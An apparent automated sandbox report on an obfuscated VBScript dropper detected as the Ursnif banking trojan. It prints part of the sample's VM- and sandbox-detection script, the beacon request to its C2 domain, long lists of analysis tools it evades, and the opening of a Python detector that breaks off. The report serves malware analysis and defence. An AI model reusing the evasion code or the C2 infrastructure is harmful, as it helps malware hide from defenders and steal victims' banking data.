Analysis Report 0HsPbXmcFf1k.vbs

Overview

General Information

Sample Name: 0HsPbXmcFf1k.vbs
Analysis ID: 329550
MD5: b75cacca388f6233844e2720bc52a9cd
SHA1: de080d98e0f092175d71f15d78ca92e1665edb53
SHA256: a5b2a02293e8875977dc822c8b1ca4101c2e378463018a5b6a572be559e3abb4

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Machine Learning detection for dropped file
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

AV Detection:

Multi AV Scanner detection for domain / URL
Source: api10.laptok.at Virustotal: Detection: 12%
Source: http://api10.laptok.at/favicon.ico Virustotal: Detection: 12%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj Metadefender: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj ReversingLabs: Detection: 32%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj Joe Sandbox ML: detected
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local

Networking:

IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 47.241.19.44
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic HTTP traffic detected:
  GET /api1/up8ONzjM/NUlpC0iTl8QPTXkOW4B0HW_/2BJhTzjeJq/8OY5q_2FvwI2aBOZa/blCNrgbOTsXG/HhSGjlZAz75/MGS0M3hXIYptAx/t_2BV8CyK5tAOx9S5ETcL/RfswvYGcruz09Ttu/liLSJkBAsVxHqgz/lU4z93taaS3OdirxC8/XaU5JN3Fl/kDBJId8zKh02ccx1lAnJ/hYXmd9L_2FBIPWbwnnA/RUKF8siFTAyjQU0l65PXXn/uAbc5e9Igb03_/2Bph4va6/5CKxcM_0A_0DG5URWLIjFfc/_2BGXTJPcZ/281nTqW9aBaFUw_2F/4c_2FBISILQC/Ywr7kYPa7W2/Rgd_2BAEKFtO/GAw HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: api10.laptok.at
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /favicon.ico HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: api10.laptok.at
  Connection: Keep-Alive
Source: msapplication.xml0.26.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xca22f249,0x01d6d02f</date><accdate>0xca22f249,0x01d6d02f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.26.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xca22f249,0x01d6d02f</date><accdate>0xca2554d3,0x01d6d02f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.26.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xca27b70e,0x01d6d02f</date><accdate>0xca27b70e,0x01d6d02f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.26.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xca27b70e,0x01d6d02f</date><accdate>0xca27b70e,0x01d6d02f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.26.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xca2c7bae,0x01d6d02f</date><accdate>0xca2c7bae,0x01d6d02f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.26.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xca2c7bae,0x01d6d02f</date><accdate>0xca2c7bae,0x01d6d02f</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Fri, 11 Dec 2020 17:37:23 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  Vary: Accept-Encoding
  Content-Encoding: gzip
  Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: {F3DA31CA-3C22-11EB-90E4-ECF4BB862DED}.dat.26.dr String found in binary or memory: http://api10.laptok.at/api1/up8ONzjM/NUlpC0iTl8QPTXkOW4B0HW_/2BJhTzjeJq/8OY5q_2FvwI2aBOZa/blCNrgbOTs
Source: msapplication.xml.26.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.26.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.26.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.26.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.26.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.26.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.26.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.26.dr String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.444347037.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444433132.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444295497.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444442868.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.445790289.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444323990.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444401752.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444370591.0000000005458000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.444420524.0000000005458000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match, same nine memory dump sources as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing above

System Summary:

Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj CEA0B6B83210A878E1BCC0C792658CA341911E8C43FDE86524501D265C8BAE16
Java / VBScript file with very long strings (likely obfuscated code)
Source: 0HsPbXmcFf1k.vbs Initial sample: Strings found which are bigger than 50
Source: magnesia.xcodeproj.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winVBS@4/20@1/1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0HsPbXmcFf1k.vbs'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0HsPbXmcFf1k.vbs'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1948 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1948 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: c:\personthought\Voicehave\WhetherSeem\SpendGame\ThoughtHer\bit.pdb0B source: wscript.exe, 00000000.00000003.234550233.00000205400E6000.00000004.00000001.sdmp, magnesia.xcodeproj.0.dr
Source: Binary string: c:\personthought\Voicehave\WhetherSeem\SpendGame\ThoughtHer\bit.pdb source: wscript.exe, 00000000.00000003.234550233.00000205400E6000.00000004.00000001.sdmp, magnesia.xcodeproj.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.ScriptName, cStr(649374277)) > 0 And KPEkhN = 0) ThenExit FunctionEnd If' harbinger gigging supervene patient pink ingest Levitt Shari Manhattan sawmill elucidate171 cereus catastrophe Carolingian597 imbalance Scott avionic augment Daley proboscis Singapore mycobacteria completion listen. pamper nutrition Agee ripple stockbroker repelling appraise tube solicitous pragmatic heartland Rochester Goodwin. agone Gascony umpire megohm punk leatherwork thrifty ambiguity henceforth TV flounce clairvoyant astronomer hall icicle casework rainstorm salesman accordion. rabbinical. chive extraordinary curlew gauze Set qrkNb = GetObject("winmgmts:\\.\root\cimv2")Set PMWjUlItems = qrkNb.ExecQuery("Select * from Win32_Processor", , (182 - ((69 - 4.0) + (30 + 39.0))))' trackage posable council desire straightaway Nikko geophysics anthem beater, Dada heat jettison backstage brant screed fetus, sough gesture uremia, 1631324 woody mitre guild toponymy dusky345 alphabetic Pegasus Skippy. Rawlinson moss stripe parse Jed halma. cane. 8911536 silicic Goff pitman torr angel backfill gar46 billet, 9998939 sausage. postpone bistate nightfall inane smooth civilian, 9785974 constraint haplology Mekong knead decontrolled nimble dynamite ignore consultation equipoise For Each ZhxjBO In PMWjUlItemsREM raunchy monic raucous phosphorescent, faint Patsy inviolable floruit gs Edward honorarium epiphysis. katydid brighten abc pyrotechnic audacious counterproposal analyst doeuvre Burnside jerry Ito181 exotica. 3356268 pewter416 architectural fascicle346 swivel import cherubim807 pulley fluid soignee Barnum. strengthen storefront580 during theory rheostat Borealis Wesleyan Bologna Vernon alpaca t profile accelerate switchman buckhorn facetious eyelet mercer629 stumpy Columbus documentation collector chemistry reduce Moser bail behold buttonhole neuritis Topeka deerstalker mantis auntie Vreeland earnest. 
7086757 REM copulate quirk613 armature eminent Hermite striate, horizon Permian expiration lotus concubine sagacious. erg Byzantine seek Broadway bossy, kittenish vagrant, 4130644 Tantric Gilead Harmon whatre Goldstein Heuser wardrobe giddy plague Hertzog marksmen Dahl bowmen deconvolution cessation clitoris impel dubious haggard stifle possessive, hectic peek postorder march emphases Stevenson, If ZhxjBO.NumberOfCores < ((56 + (-40.0)) + (-(1305 - (96 + 1196.0)))) ThenIVyhS = TrueEnd IfNextIf IVyhS ThenJyWHJqREM confess casino veterinary hydroxy chartreuse buzzy subsume. Darwin buteo Nazism flourish sorrel Agatha32 whereon supervisory266 seasonal firecracker diode Lauderdale psychophysic suffer jowl, Lisa sclerotic militia grantee mambo contrition Pennsylvania wysiwyg progenitor Montgomery Natchez witness TOEFL orthorhombic fate anticipatory poignant trot inflammatory bulbous sawyer sequin mutagen complimentary thymus tie. swag horseback counterclockwise headdress puffball suntanning End IfEnd FunctionFunction Kelley()If (InStr(WScript.ScriptName, "TESTING") > 0) ThenEx
PE file contains an invalid checksum
Source: magnesia.xcodeproj.0.dr Static PE information: real checksum: 0x37c70 should be: 0x37c79

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match, same nine memory dump sources as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing above
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\0hspbxmcff1k.vbs
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: SANDBOXIEDCOMLAUNCH.EXE{
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXEX
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: FAKEHTTPSERVER.EXE@
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: SANDBOXIERPCSS.EXE:@V5
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE@
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXEP
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXE@T
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE@
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE@
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXE@K
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE
Source: wscript.exe, 00000000.00000002.250885232.000002053E1D4000.00000004.00000001.sdmp Binary or memory string: CARGILL = ARRAY("FRIDA-WINJECTOR-HELPER-64.EXE","FRIDA-WINJECTOR-HELPER-32.EXE","PYTHONW.EXE","PYW.EXE","CMDVIRTH.EXE","ALIVE.EXE","FILEWATCHERSERVICE.EXE","NGVMSVC.EXE","SANDBOXIERPCSS.EXE","ANALYZER.EXE","FORTITRACE
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXECKSA@
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\magnesia.xcodeproj
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 5752 Thread sleep time: -30000s >= -30000s
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local
Source: wscript.exe, 00000000.00000002.254514322.0000020544530000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000002.254514322.0000020544530000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.254514322.0000020544530000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.254267241.0000020541BD9000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000002.254514322.0000020544530000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: magnesia.xcodeproj.0.dr

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Florentine.zip VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.250313883.000002054008A000.00000004.00000001.sdmp Binary or memory string: autoruns.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.239249782.00000205400AD000.00000004.00000001.sdmp Binary or memory string: regshot.exe
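Nine of the ten tool names above come from the same small region of wscript.exe memory, and that co-location is what makes them a useful signal: "wireshark.exe" on its own turns up in plenty of benign text, but a debugger, two network monitors, Sysinternals tools, a PE editor and a registry-diffing tool read out of one buffer is the characteristic shape of a pre-execution analysis-tool check. As an added example (not Joe Sandbox's signature logic and not the sample's code), the Python below parses report lines in the format used on this page, groups hits by memory region, and flags only regions where several distinct tool names co-occur. The category labels, the threshold and the constructed noise lines are the editor's assumptions.

```python
import re
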